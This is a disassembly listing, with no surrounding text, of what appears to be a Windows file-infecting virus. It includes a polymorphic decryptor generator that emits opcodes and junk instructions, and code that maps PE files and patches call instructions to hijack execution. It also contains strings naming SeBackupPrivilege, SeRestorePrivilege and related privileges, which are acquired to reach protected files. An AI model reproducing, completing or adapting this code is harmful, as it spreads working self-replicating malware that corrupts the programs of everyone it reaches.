dd 0FE72E851h, 0B503FFFFh, 1042F8h, 78C085ADh, 84840FFBh
dd 0FF000000h, 1042F8B5h, 55E85000h, 3FFFFFEh, 1042F885h
dd 0F8858F00h, 3001042h, 83532404h, 0DB3302C0h, 0E308B60Fh
dd 20C98012h, 2424C153h, 241C2904h, 5B240C29h, 81E9EB40h
dd 0BBD70FFBh, 813E74DDh, 6E45A8FBh, 813674DBh, 0A13B59FBh
dd 812E74FFh, 0B522D6FBh, 812674ACh, 58E993FBh, 811E74F3h
dd 58E97DFBh, 811674F3h, 253F46FBh, 810E74E1h, 253F30FBh
dd 0FF0674E1h, 1042D495h, 71E95B00h, 5EFFFFFFh, 0E914C283h
dd 0FFFFFEEFh, 46A00C3h, 0F549E858h, 9588FFFFh, 102641h
dd 1831B866h, 0E4C0E202h, 66E20203h, 58066AABh, 0FFF52EE8h
dd 8C283FFh, 56AD187h, 0F521E858h, 0FA80FFFFh, 0B00B7303h
dd 41850250h, 0AA001026h, 686A27EBh, 0FA80AA58h, 0B0187503h
dd 0F501E811h, 1B8FFFFh, 84000000h, 0D10D74D2h, 0EBCAFEE0h
dd 0B805EBF6h, 80000000h, 0C3BFE2ABh, 39CC958Dh, 0D72B0010h
dd 0F7C3DAF7h, 1039C085h, 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_4206D6
or ax, 2589h
jmp short loc_4206E9
; ---------------------------------------------------------------------------
loc_4206D6: ; CODE XREF: .rsrc:004206CE�j
test byte ptr [ebp+1039BEh], 2
jnz short loc_4206E5
or ax, 2531h
jmp short loc_4206E9
; ---------------------------------------------------------------------------
loc_4206E5: ; CODE XREF: .rsrc:004206DD�j
or ax, 2501h
loc_4206E9: ; CODE XREF: .rsrc:004206D4�j
; .rsrc:004206E3�j
stosw
call near ptr dword_420410+29Ch
mov eax, [ebx+34h]
mov [ebp+1042E8h], edx
stosd
retn
; =============== S U B R O U T I N E =======================================
sub_4206FB proc near ; CODE XREF: .rsrc:00420D47�p
test dword ptr [ebp+1039C0h], 10000000h
setnz al
add al, 0BCh
stosb
call near ptr dword_420410+29Ch
mov [ebp+1042ECh], edx
test byte ptr [ebp+1039BEh], 1
jnz short loc_420723
rdtsc
jmp short loc_420725
; ---------------------------------------------------------------------------
loc_420723: ; CODE XREF: sub_4206FB+22�j
sub eax, eax
loc_420725: ; CODE XREF: sub_4206FB+26�j
stosd
retn
sub_4206FB endp
; =============== S U B R O U T I N E =======================================
sub_420727 proc near ; CODE XREF: .rsrc:loc_420D51�p
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_42075A
mov al, [ebp+1039BAh]
shl eax, 0Bh
or ax, 458Bh
stosw
mov al, 0F8h
stosb
mov al, [ebp+1039BAh]
shl eax, 1Bh
add eax, 6896467h
stosd
xor eax, eax
stosw
jmp short locret_42076C
; ---------------------------------------------------------------------------
loc_42075A: ; CODE XREF: sub_420727+A�j
mov eax, 58F64h
stosd
mov al, [ebp+1039BAh]
add al, 58h
shl eax, 18h
stosd
locret_42076C: ; CODE XREF: sub_420727+31�j
retn
sub_420727 endp
; =============== S U B R O U T I N E =======================================
sub_42076D proc near ; CODE XREF: sub_4207DF:loc_420806�p
; sub_4207DF+4C�p ...
mov byte ptr [ebp+10279Ch], 9
jmp short loc_42079B
; ---------------------------------------------------------------------------
loc_420776: ; CODE XREF: sub_42076D+44�j
mov al, 0FCh
jmp short loc_42079A
; ---------------------------------------------------------------------------
loc_42077A: ; CODE XREF: sub_42076D+48�j
mov ax, 0EBh
stosw
jmp short loc_42079B
; ---------------------------------------------------------------------------
loc_420782: ; CODE XREF: sub_42076D+4C�j
push 4
pop eax
call near ptr dword_41FB50+43h
lea eax, [edx+edx*8]
shl eax, 8
add ax, 0C089h
stosw
jmp short loc_42079B
; ---------------------------------------------------------------------------
loc_420798: ; CODE XREF: sub_42076D+50�j
mov al, 90h
loc_42079A: ; CODE XREF: sub_42076D+B�j
; sub_42076D+60�j ...
stosb
loc_42079B: ; CODE XREF: sub_42076D+7�j
; sub_42076D+13�j ...
push 1Bh
pop eax
call near ptr dword_41FB50+43h
add byte ptr [ebp+10279Ch], 6
cmp dl, 8
jnb short locret_4207DE
test dl, dl
jz short loc_420776
dec dl
jz short loc_42077A
dec dl
jz short loc_420782
dec dl
jz short loc_420798
dec dl
jz short loc_4207CF
dec dl
jz short loc_4207D6
dec dl
jz short loc_4207DA
mov al, 0F9h
jmp short loc_42079A
; ---------------------------------------------------------------------------
loc_4207CF: ; CODE XREF: sub_42076D+54�j
mov al, 87h
stosb
mov al, 0DBh
jmp short loc_42079A
; ---------------------------------------------------------------------------
loc_4207D6: ; CODE XREF: sub_42076D+58�j
mov al, 0F5h
jmp short loc_42079A
; ---------------------------------------------------------------------------
loc_4207DA: ; CODE XREF: sub_42076D+5C�j
mov al, 0F8h
jmp short loc_42079A
; ---------------------------------------------------------------------------
locret_4207DE: ; CODE XREF: sub_42076D+40�j
retn
sub_42076D endp
; =============== S U B R O U T I N E =======================================
sub_4207DF proc near ; CODE XREF: .rsrc:loc_420C28�p
; .rsrc:00420DDB�p
test dword ptr [ebp+1039C0h], 2000h
mov al, 86h
jnz short loc_4207EF
add al, 4
loc_4207EF: ; CODE XREF: sub_4207DF+C�j
lea ecx, [edi-2]
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short loc_420806
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_420806: ; CODE XREF: sub_4207DF+1E�j
call sub_42076D
test dword ptr [ebp+1039C0h], 4000h
mov ax, 3166h
jnz short loc_42081D
mov ah, 29h
loc_42081D: ; CODE XREF: sub_4207DF+3A�j
stosw
mov al, 18h
or al, [ebp+1039BAh]
shl al, 3
stosb
call sub_42076D
mov al, 88h
test dword ptr [ebp+1039C0h], 8000h
jnz short loc_420840
mov al, 86h
loc_420840: ; CODE XREF: sub_4207DF+5D�j
mov ah, [ebp+1039B8h]
stosw
cmp ah, 5
jnz short locret_420854
mov al, 0
or byte ptr [edi-1], 40h
stosb
locret_420854: ; CODE XREF: sub_4207DF+6C�j
retn
sub_4207DF endp
; ---------------------------------------------------------------------------
loc_420855: ; CODE XREF: sub_42145B+183�p
lea edi, [ebp+1039CCh]
call sub_42076D
test dword ptr [ebp+1039C0h], 400000h
jz short near ptr unk_42086F
mov al, 60h
stosb
; ---------------------------------------------------------------------------
unk_42086F db 0F7h ; ÷ ; CODE XREF: .rsrc:0042086A�j
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
adc [edi+eax-48h], dh
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
db 2 dup(0), 2
dd 0F0840Fh, 0E8B00000h, 0BD89ABAAh, 1042D8h, 0FFFECCE8h
dd 0AAE8B0FFh, 0DCBD89ABh, 0E8001042h, 0FFFFFEBDh, 39C085F7h
dd 30010h, 1A740000h, 39C085F7h, 10h, 0A740200h, 0FFFE2EE8h
dd 0FE9BE8FFh, 0E9B0FFFFh, 858BABAAh, 1042D8h, 0C82BCF8Bh
dd 42E0BD89h, 48890010h, 6467B8FCh, 33AB36FFh, 0F7AB66C0h
dd 1039C085h, 300h, 0F6137400h, 1039BE85h, 0A748000h, 0FFFDAAE8h
dd 0FE5BE8FFh, 67B8FFFFh, 0AB268964h, 0AB66C033h, 39C085F7h
dd 30010h, 5A740000h, 39BE85F6h, 75800010h, 0FD81E80Ah
dd 32E8FFFFh, 0E8FFFFFEh, 0FFFFFD02h, 14E820B0h, 0E3FFFFFBh
dd 0FFB86639h, 91AB6615h, 0C0958BABh, 0F7001039h, 3C2F7D2h
dd 75000000h, 0FCDCE814h, 1FB0FFFFh, 0FFFAEEE8h, 0FFB866FFh
dd 91AB6615h, 8BCF8BABh, 1042E085h, 89C82B00h, 85F7FC48h
dd 1039C0h, 3, 85F73874h, 1039C0h, 0C000000h, 85F72C74h
dd 1039C0h, 2000000h, 0C2E80A75h, 0E8FFFFFDh, 0FFFFFD4Bh
dd 39C085F7h, 10h, 0A740800h, 0FFFDACE8h, 0FD61E8FFh, 85F7FFFFh
dd 1039C0h, 4, 96E81774h, 0B8FFFFFDh, 0C8FEC029h, 0C008B8ABh
dd 0B8AB0474h, 67EBF875h, 0FD7FE8ABh, 85F7FFFFh, 1039C0h
dd 8, 0BD807275h, 1039BEh, 0E8697400h, 0FFFFFD65h, 291829B8h
dd 0BAA50AC9h, 0C0001039h, 0A50A03E4h, 1039BAh, 0FD4BE8ABh
dd 0B1B0FFFFh, 0BE858AAAh, 0AA001039h, 0FFFD3CE8h, 85B60FFFh
dd 1039BAh, 4C0048Dh, 8E0C140h, 0AB668DB0h, 57AA01B0h
dd 0FFFD20E8h, 243C29FFh, 0FBE2B866h, 0C085F759h, 10001039h
dd 74000000h, 0AA49B007h, 0FA75B866h, 0AB66E102h, 0FFFCFCE8h
dd 0AAE8B0FFh, 89ABC033h, 1042C4BDh, 0C085F700h, 20001039h
dd 75000000h, 0DEE8573Bh, 0F7FFFFFCh, 1039C085h, 0
dd 89187480h, 1042F0BDh, 0FD39E800h, 0C2E8FFFFh, 0B0FFFFFCh
dd 0BAE8AAC3h, 5AFFFFFCh, 58B0CF8Bh, 850ACA2Bh, 1039B8h
dd 0AAFC4A89h, 0FFFCA4E8h, 81B866FFh, 0C085F7C0h, 40001039h
dd 74000000h, 28C48003h, 39B8A50Ah, 0AB660010h, 42C8BD89h
dd 0F7AB0010h, 1039C085h, 0
; ---------------------------------------------------------------------------
inc eax
jnz short loc_420B00
mov al, 50h
add al, [ebp+1039B8h]
stosb
loc_420B00: ; CODE XREF: .rsrc:00420AF5�j
test dword ptr [ebp+1039C0h], 80h
jnz short loc_420B17
mov al, 0B8h
or al, [ebp+1039B9h]
stosb
jmp short loc_420B54
; ---------------------------------------------------------------------------
loc_420B17: ; CODE XREF: .rsrc:00420B0A�j
mov ax, 1831h
test dword ptr [ebp+1039C0h], 100h
jz short loc_420B29
mov al, 29h
loc_420B29: ; CODE XREF: .rsrc:00420B25�j
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
mov ax, 0F081h
test dword ptr [ebp+1039C0h], 200h
jnz short loc_420B4C
mov ah, 0C8h
loc_420B4C: ; CODE XREF: .rsrc:00420B48�j
or ah, [ebp+1039B9h]
stosw
loc_420B54: ; CODE XREF: .rsrc:00420B15�j
mov [ebp+1042E4h], edi
mov eax, 29CCh
stosd
test dword ptr [ebp+1039C0h], 8
jz short loc_420BDD
call sub_42076D
test dword ptr [ebp+1039C0h], 400h
jnz short loc_420B88
mov al, 0B8h
or al, [ebp+1039BAh]
stosb
jmp short loc_420BD5
; ---------------------------------------------------------------------------
loc_420B88: ; CODE XREF: .rsrc:00420B7B�j
test dword ptr [ebp+1039C0h], 800h
jnz short loc_420BA5
mov ax, 0E083h
or ah, [ebp+1039BAh]
stosw
xor eax, eax
stosb
jmp short loc_420BBA
; ---------------------------------------------------------------------------
loc_420BA5: ; CODE XREF: .rsrc:00420B92�j
mov ax, 1829h
or ah, [ebp+1039BAh]
shl ah, 3
or ah, [ebp+1039BAh]
stosw
loc_420BBA: ; CODE XREF: .rsrc:00420BA3�j
test dword ptr [ebp+1039C0h], 1000h
mov ax, 0C081h
jz short loc_420BCD
add ah, 8
loc_420BCD: ; CODE XREF: .rsrc:00420BC8�j
or ah, [ebp+1039BAh]
stosw
loc_420BD5: ; CODE XREF: .rsrc:00420B86�j
movzx eax, byte ptr [ebp+1039BEh]
stosd
loc_420BDD: ; CODE XREF: .rsrc:00420B6A�j
call sub_42076D
test dword ptr [ebp+1039C0h], 40000000h
jz short loc_420BFC
mov al, 50h
add al, [ebp+1039B8h]
stosb
call sub_42076D
loc_420BFC: ; CODE XREF: .rsrc:00420BEC�j
lea ecx, [edi-2]
mov [ebp+1042CCh], ecx
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_420C28
mov al, 0E8h
stosb
mov eax, [ebp+1042F0h]
sub eax, edi
sub eax, 4
stosd
mov [ebp+1042F0h], edi
jmp short loc_420C2D
; ---------------------------------------------------------------------------
loc_420C28: ; CODE XREF: .rsrc:00420C0F�j
call sub_4207DF
loc_420C2D: ; CODE XREF: .rsrc:00420C26�j
call sub_42076D
test dword ptr [ebp+1039C0h], 10000h
jnz short loc_420C49
mov al, 40h
or al, [ebp+1039B8h]
stosb
jmp short loc_420C58
; ---------------------------------------------------------------------------
loc_420C49: ; CODE XREF: .rsrc:00420C3C�j
mov ax, 0C083h
or ah, [ebp+1039B8h]
stosw
mov al, 1
stosb
loc_420C58: ; CODE XREF: .rsrc:00420C47�j
test dword ptr [ebp+1039C0h], 20000h
jnz short loc_420C93
test dword ptr [ebp+1039C0h], 40000h
jnz short loc_420C8A
mov al, 0C0h
or al, [ebp+1039BAh]
mov ah, [ebp+1039BFh]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_420C92
; ---------------------------------------------------------------------------
loc_420C8A: ; CODE XREF: .rsrc:00420C6E�j
mov al, 40h
or al, [ebp+1039BAh]
loc_420C92: ; CODE XREF: .rsrc:00420C88�j
stosb
loc_420C93: ; CODE XREF: .rsrc:00420C62�j
test dword ptr [ebp+1039C0h], 80000h
jnz short loc_420CAF
mov ax, 0E883h
or ah, [ebp+1039B9h]
stosw
mov al, 1
jmp short loc_420CB7
; ---------------------------------------------------------------------------
loc_420CAF: ; CODE XREF: .rsrc:00420C9D�j
mov al, 48h
or al, [ebp+1039B9h]
loc_420CB7: ; CODE XREF: .rsrc:00420CAD�j
stosb
call sub_42076D
test dword ptr [ebp+1039C0h], 100000h
mov cl, 75h
jnz short loc_420CF0
mov ax, 0F883h
or ah, [ebp+1039B9h]
stosw
xor eax, eax
stosb
sub [ebp+1042CCh], edi
test dword ptr [ebp+1039C0h], 200000h
jnz short loc_420D0B
mov cl, 77h
jmp short loc_420D0B
; ---------------------------------------------------------------------------
loc_420CF0: ; CODE XREF: .rsrc:00420CC9�j
mov ax, 1809h
or ah, [ebp+1039B9h]
shl ah, 3
or ah, [ebp+1039B9h]
stosw
sub [ebp+1042CCh], edi
loc_420D0B: ; CODE XREF: .rsrc:00420CEA�j
; .rsrc:00420CEE�j
mov al, cl
mov ah, [ebp+1042CCh]
stosw
mov al, 58h
add al, [ebp+1039B8h]
stosb
call sub_42076D
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_420D5B
test dword ptr [ebp+1039C0h], 8000000h
jnz short loc_420D5B
test dword ptr [ebp+1039C0h], 6000000h
jnz short loc_420D51
call sub_4206FB
call sub_42076D
loc_420D51: ; CODE XREF: .rsrc:00420D45�j
call sub_420727
call sub_42076D
loc_420D5B: ; CODE XREF: .rsrc:00420D2D�j
; .rsrc:00420D39�j
test dword ptr [ebp+1039C0h], 10000000h
jz short loc_420D6F
mov al, 0C9h
stosb
call sub_42076D
loc_420D6F: ; CODE XREF: .rsrc:00420D65�j
test dword ptr [ebp+1039C0h], 400000h
jz short loc_420DA5
mov al, 7
sub al, [ebp+1039B8h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+1039B8h]
shl ah, 3
add ah, 4
stosd
call sub_42076D
mov al, 61h
stosb
call sub_42076D
loc_420DA5: ; CODE XREF: .rsrc:00420D79�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
stosw
call sub_42076D
test dword ptr [ebp+1039C0h], 20h
jz short loc_420E31
test dword ptr [ebp+1039C0h], 80000000h
jz short loc_420DED
mov eax, edi
mov ecx, [ebp+1042F0h]
sub eax, ecx
mov [ecx-4], eax
call sub_4207DF
call sub_42076D
mov al, 0C3h
stosb
call sub_42076D
loc_420DED: ; CODE XREF: .rsrc:00420DCC�j
mov eax, edi
mov ecx, [ebp+1042C4h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+1039B8h]
stosb
call sub_42076D
test dword ptr [ebp+1039C0h], 800000h
jz short loc_420E20
mov ax, 0C350h
or al, [ebp+1039B8h]
jmp short loc_420E2A
; ---------------------------------------------------------------------------
loc_420E20: ; CODE XREF: .rsrc:00420E12�j
mov ax, 0E0FFh
or ah, [ebp+1039B8h]
loc_420E2A: ; CODE XREF: .rsrc:00420E1E�j
stosw
call sub_42076D
loc_420E31: ; CODE XREF: .rsrc:00420DC0�j
test dword ptr [ebp+1039C0h], 2000003h
jz short loc_420E9C
mov ecx, edi
mov eax, [ebp+1042DCh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+1039C0h], 1000000h
jnz short loc_420E66
lea eax, [ebp+1039B8h]
loc_420E5E: ; CODE XREF: .rsrc:00420E64�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_420E5E
loc_420E66: ; CODE XREF: .rsrc:00420E56�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_420E7B
mov ax, 0C031h
stosw
loc_420E7B: ; CODE XREF: .rsrc:00420E73�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_420E94
mov ax, 0C031h
stosw
loc_420E94: ; CODE XREF: .rsrc:00420E8C�j
mov al, 0C3h
stosb
call sub_42076D
loc_420E9C: ; CODE XREF: .rsrc:00420E3B�j
lea eax, [ebp+1039CCh]
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_420EB4
push edi
sub edi, eax
pop eax
jmp short loc_420ECD
; ---------------------------------------------------------------------------
loc_420EB4: ; CODE XREF: .rsrc:00420EAC�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_420ECD: ; CODE XREF: .rsrc:00420EB2�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_420EED
neg eax
loc_420EED: ; CODE XREF: .rsrc:00420EE9�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_420EF1 proc near ; CODE XREF: sub_42145B+336�p
push esi
push edi
cmp dword ptr [ebp+104300h], 0
jz loc_4210D9
call near ptr loc_420F11+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_420F11: ; CODE XREF: sub_420EF1+F�p
add bh, bh
sub_420EF1 endp ; sp-analysis failed
xchg eax, ebp
scasb
db 3Eh
adc [eax], al
mov [ebp+104314h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call near ptr dword_420410+4
mov edx, [ebp+1042F4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104318h], eax
add eax, [edx+8]
mov [ebp+10431Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call near ptr dword_420410+4
mov edi, [ebp+1042F4h]
push esi
call near ptr dword_420410+4
mov edx, [ebp+1042F4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_4210D9
jz loc_4210D9
add esi, [ebp+1042F8h]
add esi, [ebp+1042B4h]
; START OF FUNCTION CHUNK FOR sub_4210AA
loc_420F8B: ; CODE XREF: sub_4210AA+29�j
lodsb
cmp al, 0E8h
jnz loc_421036
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_420410+4
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_420FB9
cmp eax, [edi+0Ch]
jnb loc_4210D2
jmp short loc_420FC5
; ---------------------------------------------------------------------------
loc_420FB9: ; CODE XREF: sub_4210AA-FE�j
cmp [ebp+1042F4h], edx
jnz loc_4210D2
loc_420FC5: ; CODE XREF: sub_4210AA-F3�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4210D2
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_420410+4
cmp [ebp+1042F4h], edi
jnz loc_4210D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4210D2
cmp eax, [edi+8]
jnb loc_4210D2
loc_42100E: ; CODE XREF: sub_4210AA+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4210E8
jmp loc_4210D2
; ---------------------------------------------------------------------------
loc_421036: ; CODE XREF: sub_4210AA-11C�j
cmp al, 0FFh
jnz loc_4210D2
cmp byte ptr [esi], 15h
jnz loc_4210D2
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_420410+4
cmp [ebp+1042F4h], edi
jnz short loc_4210D2
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_42107F
cmp eax, [ebp+10431Ch]
jb short loc_4210E8
loc_42107F: ; CODE XREF: sub_4210AA-35�j
cmp eax, 70000000h
jb short loc_4210BD
call sub_4210AA
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_4210A9
add esp, 10h
push dword ptr [ecx]
pop [esp-8+arg_20]
popa
jmp short loc_4210C4
; ---------------------------------------------------------------------------
locret_4210A9: ; CODE XREF: sub_4210AA-F�j
retn
; END OF FUNCTION CHUNK FOR sub_4210AA
; =============== S U B R O U T I N E =======================================
sub_4210AA proc near ; CODE XREF: sub_4210AA-24�p
var_10 = dword ptr -10h
arg_20 = dword ptr 24h
; FUNCTION CHUNK AT 00420F8B SIZE 0000011F BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_420410+10Bh
popa
loc_4210BD: ; CODE XREF: sub_4210AA-26�j
test eax, 80000000h
jnz short loc_4210D2
loc_4210C4: ; CODE XREF: sub_4210AA-3�j
sub eax, [edi+0Ch]
jb short loc_4210D2
cmp eax, [edi+8]
jb loc_42100E
loc_4210D2: ; CODE XREF: sub_4210AA-F9�j
; sub_4210AA-EB�j ...
dec ecx
jnz loc_420F8B
loc_4210D9: ; CODE XREF: sub_420EF1+9�j
; .rsrc:00420F73�j ...
mov edi, [esp+0]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_42112A
; ---------------------------------------------------------------------------
loc_4210E8: ; CODE XREF: sub_4210AA-7F�j
; sub_4210AA-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+10h+var_10]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_42112A: ; CODE XREF: sub_4210AA+3C�j
pop edi
pop esi
retn
sub_4210AA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42112D proc near ; CODE XREF: .rsrc:0042142E�p
; FUNCTION CHUNK AT 00421257 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EBAh]
shr eax, 1Fh
jnz loc_421257
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F1Ah]
test eax, eax
pop edi
js loc_421257
call sub_41F5AF
call near ptr loc_421168+5
push ebx
db 65h
jz short near ptr unk_4211A6
imul ebp, [ebp+53h], 72756365h
loc_421168: ; CODE XREF: sub_42112D+2A�p
imul esi, [ecx+edi*2+41h], 88B5FF00h
sub_42112D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E6Eh]
mov [ebp+104290h], eax
call near ptr loc_42119C+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_421203
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_42119C: ; CODE XREF: .rsrc:0042117F�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_4211A6 db 0 ; CODE XREF: sub_42112D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_421203: ; CODE XREF: .rsrc:0042118D�j
lea eax, [ebp+103DCCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F26h]
mov [esp], edi
call dword ptr [ebp+103E62h]
sub al, al
lea edi, [ebp+104184h]
push eax
push eax
push eax
push dword ptr [ebp+103DCCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104290h]
push esp
push 4
push edi
call dword ptr [ebp+104290h]
add esp, 14h
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E9Eh]
; START OF FUNCTION CHUNK FOR sub_42112D
loc_421257: ; CODE XREF: sub_42112D+A�j
; sub_42112D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_42112D
; =============== S U B R O U T I N E =======================================
sub_421259 proc near ; CODE XREF: .rsrc:00421427�p
; .rsrc:00421433�p ...
lea esi, [ebp+104184h]
push esi
call dword ptr [ebp+103EA2h]
cmp eax, 0FFFFFFFFh
jz locret_42132A
mov [ebp+104294h], eax
push 0
push esi
call dword ptr [ebp+103EDEh]
test eax, eax
jz locret_42132A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E7Eh]
cmp eax, 0FFFFFFFFh
jz loc_4218AB
mov [ebp+104298h], eax
lea ecx, [ebp+10429Ch]
lea edx, [ebp+1042A4h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103EAAh]
cmp eax, 0FFFFFFFFh
jz loc_42189F
push 0
push dword ptr [ebp+104298h]
call dword ptr [ebp+103EA6h]
cmp eax, 0FFFFFFFFh
jz loc_42189F
mov [ebp+1042ACh], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104298h]
call dword ptr [ebp+103E82h]
test eax, eax
jz loc_42189F
xor ecx, ecx
mov [ebp+1042B0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103ECAh]
test eax, eax
jz loc_421877
mov [ebp+1042B4h], eax
locret_42132A: ; CODE XREF: sub_421259+10�j
; sub_421259+27�j ...
retn
sub_421259 endp
; ---------------------------------------------------------------------------
loc_42132B: ; CODE XREF: sub_42145B+188�p
; sub_42145B+2A0�p
mov eax, 7327h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0C0h ; À
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042C0h], eax
mov eax, 29CBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_421370 proc near ; CODE XREF: sub_42145B:loc_4214D0�p
; sub_42145B+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_421375: ; CODE XREF: sub_421370+23�j
jecxz short locret_4213AC
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_4213AC
cmp dword ptr [edx+0Ch], 1
jb short loc_421375
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+1042ACh]
locret_4213AC: ; CODE XREF: sub_421370:loc_421375�j
; sub_421370+1D�j ...
retn
sub_421370 endp
; =============== S U B R O U T I N E =======================================
sub_4213AD proc near ; CODE XREF: .rsrc:00421445�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
